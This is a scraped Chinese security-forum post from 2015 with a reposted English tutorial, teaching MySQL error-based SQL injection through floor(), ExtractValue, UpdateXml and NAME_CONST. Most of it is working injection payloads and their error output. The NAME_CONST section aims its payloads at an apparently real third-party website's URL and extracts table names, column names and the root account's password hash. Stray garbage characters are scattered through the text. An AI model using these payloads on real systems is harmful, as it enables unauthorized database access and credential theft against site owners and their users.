找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2903|回复: 0
打印 上一主题 下一主题

mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2015-11-11 19:03:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:
! T+ |6 ?4 l, i1 ?首先进行正常查询:

mysql> select * from article where id = 1;2 U" K1 Y5 F; H/ t9 ]& f! ]
+—-+——-+———+& m; m7 Q9 A; }' X; ^% b! W% [
| id | title | content |; @$ B+ `$ z6 p! e
+—-+——-+———+% A/ M* C9 ]$ I5 F1 Z
|  1 | test  | do it   |0 ?. r( L+ h( c5 b+ k) T  V( S; i
+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
' V' ]6 c7 U* u# i; p7 \; l) F+ _ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
* Z% b3 ~5 ]3 X3 |7 `0 J" ]5 k% e例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);% u9 E8 v$ E+ [! b& T
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
( E4 Z% u6 Y& o: l. ^ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue0 `$ ]2 c* f$ p/ z2 }- A
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
' h( j) {# I  x1 }+ S  aERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

# z& z$ n. `$ @9 B# ?

1 f* [; C0 H2 n" x

再收集:


9 V; d) Z8 ?/ o& e& mhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) 0 w9 Z  H1 M( c! |  K8 ?/ {; J
8 ?& Y/ T  C3 k& U/ U: h
Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
  T# h! L' F5 T' g# |5 x1 ?7 L6 Q  `+ m! \5 r! G) r* Z/ t
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
/ l; |+ }: l) ]% O/ d8 H( v" T1 D0 A0 Y# _0 j6 ]0 I+ V
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
5 i8 s3 }* o, `' F1 q; j% g) k# m! s7 v  K( F. \: F2 Y
MYSQL高版本报错注入技巧-利用NAME_CONST注入
; a" E. @  I& H6 _2 J) E/ uIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
9 a; S9 i4 B' R( b% {4 O5 F" E* \; ~" R3 A0 @1 _

' n; e. W' |/ h/ O. a相关信息
! {6 a. X- }& F  @- p0 f- `9 \5 s; a/ ^
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.( W: r2 J% n5 k* b& \5 H- y) d

8 X* \. f7 W9 W# ?% W- T' d: LCode:
. u# S5 R% u. i: _+ ~7 TNAME_CONST(DATA, VALUE)
4 t1 |3 a) ~/ d# {% P  n2 L( b, y- t/ v) l: b
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
! k# P! b/ Z, U7 {6 f0 \6 k! L  e& x1 d5 c- F+ ]
SELECT NAME_CONST('TEST', 1)
$ }$ I( T) S8 E$ T, r) ?) K/ Z  n7 _
, T4 F/ ?+ u" O! [" s. e# E4 [

. f6 `% ]* Z) J; I; G) s# X2 K|---------------|% S. ?' d8 U$ U% j
|     TEST      |
+ p3 b9 J7 F) s7 S|               |
$ X4 C5 v" `5 G1 V% O) j; o|---------------|
  n+ h$ e+ h( G8 b, A|       1       |
# H6 l" E9 q: D$ i+ R5 B|               |: n' }8 e" e0 K
|---------------|
2 j. X3 u5 S7 i& Z0 y) I7 A) v0 d
' }' J: ^6 B6 q/ [# Z* H2 v6 q
, G2 w! J' d5 m+ |
. I1 P, }) p4 b  u0 ?* `% x0 I

$ X2 J! \3 F) F3 c/ F$ f  Xhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
4 J' W1 y) N. [; T6 O4 g; ^2 gIntro to MySQL Variables6 G1 K8 K1 e5 k
5 [) @' L' }; D* `# n9 h7 S
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.8 d, w2 s& G0 S( C, j1 ^& s! X0 J
7 E/ g/ L/ s- g# h7 D% \$ d  v
Code:
0 _5 K4 b1 y- N3 x; D: y5 Ghttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261
- F0 W1 K7 g; {& s: i( ?1 v
( d0 b8 F8 O6 w. d
$ ~6 G# ~1 s& j* f
7 I8 I7 c& u- T+ @" u) X/ v6 w
7 p; |6 T( Z# J! a, i5 u6 R

2 ~0 }! J0 t* s% @( [Code:- r3 t, M6 U  K8 E
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
5 Z6 c' W5 e: x
$ {0 ^. R/ K+ V: E3 R5 Q6 a

) E! V9 o6 B  J, d7 J4 UVAR = Your MySQL variable.0 l4 Z$ |, K2 W4 U6 R& ]
! q% u7 i9 i; c" p* J
MySQL 5.1.3 Server System Variables
9 _  h; m' u+ b
' ~" m, u$ Z2 s8 @- X" H: q, uLet's try it out on my site..
! x' V* ]6 x: H2 z9 K
. S8 |  Q" H, I* T" l- VCode:
* {5 E9 N6 ?) Z, W. `http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
9 _( {: s" y# y# U, f) b( C: ?+ q% I  n9 Z# b
Erroruplicate column name '5.0.27-community-nt'/ @( ?( R' G" m  ~; `) N
# y1 S& \- D' E

/ H: _( f8 f8 T9 c9 Y. [, r' j7 h( {$ M" B# q* p5 r$ Z8 @+ b
; F+ z* }/ M' H: w

7 R  K$ y+ ]( z7 F# RNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...1 ]% b9 X# R% J; O1 w/ Q
6 D/ n" y' `( t" V  u3 F& u
Data Extraction4 s6 k4 `! |) J& P& Y& i
7 l3 _4 f9 D- S; w/ `
Code:5 ^$ w" [0 t/ b. @( w2 M5 o: R
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--& h6 J2 }/ K& s3 G: |1 M
3 D0 u1 i+ v$ @

8 j5 ^6 V' L9 [9 ?& a& w7 Y* u$ _+ rWe should get a duplicate column 1 error...0 W& Z8 Z2 _% B! O4 [3 ~6 v# g2 ^

6 O7 J0 C9 H, [1 [, {% OCode:
5 c; o+ \8 l5 m* W$ }  ahttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
3 M9 U) y: U1 h# Y7 k4 g6 |0 w! C! r+ y# b6 C) [; w( |' e& f5 G* o
Erroruplicate column name '1
4 o' _+ L% s$ T
9 j8 G: g$ Q8 O, S- z" U
1 {, v. ]9 ~) h7 o0 D% `
: }, L+ p4 u6 \+ J" E
9 e: v5 c7 T* O* B
. u. E: D9 z4 z5 g( q9 L
3 x1 R7 M! H  J3 R9 ~% m) b3 h% b
Now let's get the tables out this bitch..
# q" h& T& \- U- O
. R  h5 G( O' }. MCode:
( V4 c& U7 G2 @3 l" r, g+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
2 s5 R& {. F( U' J* z
7 U( L3 ~# X. N0 N7 w$ |" d: ~
2 I( q! t' z, U: b. O, h
Let's see if it works here, if it does, we can go on and finish the job.
# b( }/ L) T1 D4 Z' d* F3 G
6 E0 L* r/ {# q/ N% ICode:  i- a4 @; K7 C  y
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
& n1 Q, i. y2 a/ G
7 i. b! T3 [: {- P' y# m' e3 L5 J, i
Erroruplicate column name 'com_admanage
) D0 h0 W2 `* }- s
6 g9 i6 D5 L3 Y
& _+ [" m4 U/ T. g" g
3 j3 j$ W$ f# A3 Z2 l( \( ?

9 p  Y3 }: Z/ t0 ~" U8 D4 z. u& M
: M' }+ S* k9 p$ G$ ^4 E2 R
, z2 V. n0 y* w6 I$ ?6 u
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.# e8 c) ^2 Z/ x9 M1 f2 e7 R

( n$ I( u& m) m6 e* |; L) K, }Let's get the columns out of the user table..
# b# Y2 o8 D* l2 W$ U
) w1 t" z$ s% e' p3 K0 o: v: x  jCode:
; t, W0 W& r, d* H+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--& a# Y7 T6 s5 Q9 y6 v9 b) k

# g2 \+ I: g& p
/ E/ R) y, n4 t/ j$ F6 f% hSo mine looks like this, and I get the duplicate column name 'Host'.
8 ~$ p- k. p7 l5 x, u! o7 ?/ F: [# L: Z; \, Z
Code:
0 f* L' P8 P8 s4 m$ R; Qhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--+ w1 E4 }% z7 t+ u: c8 n

/ Q0 J5 x; @: H+ MErroruplicate column name 'Host'. o, @  a9 E( }5 @

" @5 a# T# i; [5 ^6 I' a0 Q1 e6 \

$ W, o: U0 \' x2 i4 I9 {( }1 t8 R, t/ E/ x# y
8 u2 q1 r) [  p' |9 L" b

( ?# }* m  f& g9 u' s5 @) _# p5 U5 UWoot, time to finish this bitch off.% S( f$ z; w5 x0 w2 \
$ H( m( Z: }* p
Code:, `* O" x3 Z: z
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--! l: b  s3 y+ J  H/ X8 N) g. b+ V

$ H# o, |2 E! M3 f* t8 k: V3 U- O/ d3 [/ q8 m% _
So mine looks like this...9 y3 L: x0 H& A  o
- F* p6 ]4 x) X7 m9 s
Code:
" O% M, |* o( C% Rhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
" X3 N: I3 C% h3 Y* r
7 j, J; D% k0 E. w; H) Z7 TErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'8 ?7 S  O  o. A( x# Z7 F$ B. |

. W- `3 f7 C# ^! ?" g* g# [' X4 R, j6 n+ k% u& ^& w1 r- d
- D) ]) U, V: a, p, @. S" o% E9 B. U
$ f8 s9 H$ B; L9 U+ n
, i  u+ v/ q) w% n" R! y! @9 Q# x8 F
- r, `2 s' N1 |( `( X
And there we have it, thanks for reading.
  ^. U3 L  E2 m# f
% k0 ~- D4 u4 d7 F( n. z2 E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表